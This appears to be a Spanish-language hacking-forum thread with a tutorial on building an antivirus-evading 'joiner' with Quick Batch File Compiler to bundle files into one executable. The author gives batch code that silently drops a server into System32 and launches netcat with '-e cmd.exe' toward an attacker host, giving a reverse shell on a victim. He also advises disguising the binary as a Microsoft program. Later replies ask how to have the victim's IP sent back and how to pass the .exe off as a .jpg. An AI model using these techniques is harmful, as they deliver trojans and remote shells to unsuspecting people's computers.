Tema destacado: [Overclocking] Récords de overclock del foro
 Autor
|
Tema: Manual: JOINER con Quick Batch File Compiler (Leído 11,752 veces)
|
{Lukhardy}
 Desconectado
Mensajes: 302
|
Por -Lucas- [Pueden copiar el contenido de este tutorial y si lo van a hacer público en otro lugar digan el nombre del autor y la página del cual lo copiaron foro.elhacker.net. PERO SI SON LAMMERS, SEGURO COPIARAN ESTE TUTO Y LO PUBLICARAN EN OTRO SITIO COMO SI FUERAN SUYOS...SUCIOS LAMMERS]
Q.B.F.C. nos dá también la posibilidad de hacer un BINDER, y lo mejor es que no lo detectan los Anti-Virus. Es bastante fácil, empecemos: (Descargar Q.B.F.C. Full : http://414141.iespana.es )
1º- Abrimos el Q.B.F.C. y veremos esta ventana (Por defecto siempre se abre en la pestaña Source que es donde escribiremos el código luego). Seleccionamos la pestaña Include 
2º- Una vez en Include hacemos lo siguiente:  Prestar atención a %MYFILES%, ya que esto tendremos en cuenta a la hora de escribir el código para ejecutar nuestros archivos.
A continuación nos dirigimos a la pestaña "Source"
3º- Procedemos a escribir el código como lo explico en la siguiente imagen:  Luego presionamos en "Options" y veremos lo siguiente:  Donde podemos ver que tildo la opción de "Ghost Application" (Esto es para ejecutar el código sin mostrar la consola de comandos, es decir, de manera oculta). Presionamos Ok.
5º- Por último clickeamos en "Build". Ahí solo tendremos que escribir el nombre que le daremos a nuestro Binder (o Joiner como quieran llamarlo) y lo guardamos donde queramos.  También, en la pestaña "Custom Resources" podemos poner la descripción de nuestro programita (obviamente no vamos a poner que es un joiner si lo queremos enviar a alguien  ), el nombre de la compañía (Microsoft o algo así para disimular), La versión, y tambíen podemos cambiarle el ícono.
Aclaración: La variable %MYFILES%, no es una variable del entorno de CMD, sino que es una que asigna Q.B.F.C.
En mi caso %MYFILES% corresponde a la ruta "C:\Documents and Settings\Administrador\Configuración local\Datos de programa". Esto puede variar según la configuración de cada equipo pero no afecta en nada en lo que expliqué anteriormente.
Este manual lo hice después de probar muchos joiner/binders y que la mayoría de los antivirus los detectan. De esta manera concluyo este sencillo y espero que útil manual. -Lucas-
Sugerencias, correcciones, dudas, son aceptadas.
Ver :
"Nuevo comando nirmcd - USO": http://foro.elhacker.net/index.php/topic,187364.0.html
"Creando un Downloader en Batch": http://foro.elhacker.net/index.php/topic,186544.0.html
"Binder Quick Batch File Compiler": http://foro.elhacker.net/index.php/topic,187349.0.html
"Detener el Firewall de Windows": http://foro.elhacker.net/index.php/topic,183228.0.html
"Instalar programas "sin instalar"-Jugando con el Registro de Windows": http://foro.elhacker.net/index.php/topic,183341.0.html
Saludos a toda la comunidad.
|
|
|
|
« Última modificación: 26 Noviembre 2007, 13:37 por -Lucas- »
|
En línea
|
|
|
|
{Lukhardy}
Desconectado
Mensajes: 302
|
Una vez que la víctima ejecute el joiner creado con QBFC, los archivos que contenga serán copiados de manera automática a la correspondiente ruta que se asigne con la variable %MYFILES% (recordemos que esta no es una variable del DOS sino mas bien una variable que asigna el propio QBFC). Ahora, estos archivos puede que sean temporales (no lo sé) pero por si acaso, podemos crear un código que copie estos archivos en un directorio que nosotros queramos. ¿Cómo? ¡ Facilísimo !. @echo off
copy %MYFILES%\archivo1.ext Ruta_del_directorio
copy %MYFILES%\archivo2.ext Ruta del directorio Con esto digo que copie el archivo1.ext (.ext hace referencia a la extensión del mismo) a la ruta que nosotros elijamos. Por ejemplo, si quiero que el archivo Lucas.jpg y el archivo Server.exe se copien a la carpeta System32, tengo escribir el código de la siguiente manera: @echo off
copy %MYFILES%\Lucas.jpg %Systemroot%\System32
copy %MYFILES%\Server.exe %Systemroot%\System32 También podemos eliminar los archivos de %MYFILES% (siguiendo el ejemplo): @echo off
del %MYFILES%\Lucas.jpg
del %MYFILES%\Server.exe Creo que es importante aclarar que al usar el QBFC se tenga en cuenta que:
%MYFILES% no es una variable del entorno de DOS. Esta variable corresponde en mi caso a "C:\Documents and Settings\Administrador\Configuración local\Datos de programa" (aunque creo que a todos los que usen XP es la misma), pero eso no es problema...
Si hay personas que quieran aprender a programar en BATCH acá les dejo unos links dónde se enseña. Para los que quieran aprender a crear script batch, este es un muy buen manual: http://www.mediafire.com/?7gixtnu109rPara avanzados: http://foro.elhacker.net/index.php/topic,132924.0.html
Sugerencias, correcciones, dudas, son aceptadas.
Saludos a toda la comunidad
|
|
|
|
« Última modificación: 12 Noviembre 2007, 07:01 por -Lucas- »
|
En línea
|
|
|
|
{Lukhardy}
Desconectado
Mensajes: 302
|
Bueno, continuando con el post anterior en donde se explicó cómo funciona la variable %MYFILES%... Recordemos que el QBFC extrae los archivos en "C:\Documents and Settings\Administrador\Configuración local\Datos de programa" (En Windows XP). En otras versiones de windows no sé exactamente donded los extrae, pero eso no es problema ya que tan solo con escribir esta variable en nuestro scripts batch, la PC sabrá donde ir...  . Sigamos... Una vez que hicimos los pasos de copiar y eliminar los archivos de %MYFILES%, nuestro script tendría que ejecutar los archivos que juntamos en la nueva ubicación. Por ejemplo: Supongamos que quiero juntar al QBFC el netcat (ya que es muy usado) y se lo quiero enviar a una víctima y ejecutarle el mismo para obtener su shell de manera inversa. Entonces haré los siguiente (Este código es a modo de ejemplo, si querés mas información acerca del manejo del netcat ingresa al post de "JUGANDO CON NETCAT): @echo off
copy %MYFILES%\netcat.exe %Systemroot%\System32
del %MYFILES%\netcat.exe
start %Systemroot%\System32\netcat.exe -d -e cmd.exe ip/hostname_del_atacante puerto
exit Obviamente, este código lo tendrás que escribir en el QBFC y tendrás que juntar a éste el netcat. Bueno, como verán, lo que hice fue copiar de %MYFILES% el netcat a la dirección %Systemroot%\System32. Luego eliminé el netcat de %MYFILES%. A continuación procedo a ejecutar el netcat pero en la nueva ubicación, es decir en %Systemroot%\System32. Espero que con esto haya quedado claro como usar el QBFC, y aprovechar sus características como joiner. Saludos.
¿Críticas, sugerencias, dudas, correcciones?. Comentarlas en este post para mejorar y hacer más completa la información.
|
|
|
|
« Última modificación: 26 Noviembre 2007, 06:36 por -Lucas- »
|
En línea
|
|
|
|
Fisek
Desconectado
Mensajes: 4
|
Ya habia echo esto, lo malo que por kada Start, te habre en los procesos un cmd.exe  Sigue saliendo mejor crearlos el Setup con Winrar y Como Joiner el iexpress que trae windows y para el icono el Reshack.. Ya no hablo mas, conte todo lo que averigue en 1 semana en 1 min :S Salu2  |
|
|
|
|
En línea
|
|
|
|
{Lukhardy}
Desconectado
Mensajes: 302
|
Buenísimo, entonces decime como oculto las ventanas del DOS al ejecutar códigos batch (ya que a veces se pueden hacer ciertas cosas con esos códigos) con SFX de Winrar o Iexpress  . Ah, ya sé, seguro que con el comando start /b *.bat ejecutas los códigos en modo oculto, sí, ese método funciona muy bien. Pero... estemm... ¿acaso no aparece en la lista de proceso el cmd.exe cuando estás ejecutando el batch?. A veces es necesario usar estos tipos de código, pero siempre va a salir el cmd.exe, a menos que te hagas un programa en C/C++ u otro lenguaje. Además, cuando usas SFX con Winrar te dice que códigos se van a ejecutar en la pestaña de comentarios de las propiedades del ejecutable. Sólo en Winrar. Pero esto se puede ocultar fácilmente. Bueno, hay ciertos puntos que se pueden salvar y otros no, como es el caso del cmd.exe Saludos Fisek  . Feliz Navidad! Gracias por postear |
|
|
|
« Última modificación: 26 Diciembre 2007, 21:38 por lukhardy »
|
En línea
|
|
|
|
|
|
|
|
MagnoBalt
Desconectado
Mensajes: 58
Los Buenos Artitas Copian, los Grandes Roban
|
Hola Lukhardy podria poner la version del QBFC q estas usando por q me he bajadop uno y no trabja con la variable %MYFILE% es mas q nada para seguir tus pasoss q muestras
La q baje es la version 2.0.7.1, y los archivos q adjunto lo descomprime donde se ejecuta el empaquetador...
graciass
|
|
|
|
« Última modificación: 21 Julio 2008, 00:24 por MagnoBalt »
|
En línea
|
|
|
|
MagnoBalt
Desconectado
Mensajes: 58
Los Buenos Artitas Copian, los Grandes Roban
|
solucionadoo amigo ahi encontree en tu link el QBFC
disculpamee
|
|
|
|
|
En línea
|
|
|
|
AdX
Desconectado
Mensajes: 10
|
Yo llevo usando el QBFC desde hace cierto tiempo, y la verdad, está muy bien.
El único inconveniente que le he visto es que cuando adjuntas un archivo ejecutable o un par, el tiempo de carga del archivo generado es elevado (se queda el ordenador pensando...). Por lo demás, está muy bien.
Saludos.
|
|
|
|
|
En línea
|
|
|
|
¹4¹²
Desconectado
Mensajes: 49
|
Una dudilla... cuando creas el exe, y lo abres (o lo abre alguien  ) se ejecutan los archivos, es decir, se habre x ej. un mp3 y el server que se juntan? SAlu2 |
|
|
|
|
En línea
|
...El Ladrón es un artista creativo capaz de crear robos asombrosos, mientras que el Detective se dedica a reconstruir su trabajo; lo que lo convierte en un mero crítico...  |
|
|
{Lukhardy}
Desconectado
Mensajes: 302
|
Yo llevo usando el QBFC desde hace cierto tiempo, y la verdad, está muy bien.
El único inconveniente que le he visto es que cuando adjuntas un archivo ejecutable o un par, el tiempo de carga del archivo generado es elevado (se queda el ordenador pensando...). Por lo demás, está muy bien.
Saludos.
Tenes razon, aunque depende de la pc, es por eso que cada vez que lo hago le agrego un simple ping de 5 seg mas o menos, asi le da tiempo de ejecutar uno por vez, de lo contrario se ejecuta solo uno. A tener en cuenta esto. . Una dudilla... cuando creas el exe, y lo abres (o lo abre alguien ) se ejecutan los archivos, es decir, se habre x ej. un mp3 y el server que se juntan? SAlu2 Claro, siempre y cuando le agregues la variable %MYFILES%, que es donde se extraen los archivos adjuntados y llamas a cada archivo colocando esta variable para cada uno de ellos. Saludos
|
|
|
|
|
En línea
|
|
|
|
dr.serg
Desconectado
Mensajes: 1
|
saludos a toos soy nuevo x hay
tengo una dudiya
puedo obtener IP de la viktima
es decir el producto de mi malware que me lo mande de forma automatika
vamos es que creo que he visto en alguna historia que algun operador
batch permite mandar ciertos archivos al destino predeterminado o varios destinos
creo que asi es posible que me muestre algun que otro dato necesario
|
|
|
|
« Última modificación: 22 Agosto 2008, 02:56 por dr.serg »
|
En línea
|
|
|
|
J0e
Desconectado
Mensajes: 1
|
holas, tengo un problema segui todos los pasos pero a la hora de hacerle click en BUILD no me deja guardarlo le pongo un nombre para crearlo y me dice archivo .exe no encontrado, ayudenme pls que es lo que estoy haciendo mal.
|
|
|
|
|
En línea
|
|
|
|
opmeitle
Desconectado
Mensajes: 9
|
Muchisimas gracias, acabo de solucionar un problema pero inmediatamente crear otro...
el tema es que, me queda el archivo como un .exe y lo necesitaria como un .jpg, conoces algun programa para ocultar/cambiar la extension .exe a otra pero sin perder su ejecutabilidad??
|
|
|
|
|
En línea
|
|
|
|
|
 |
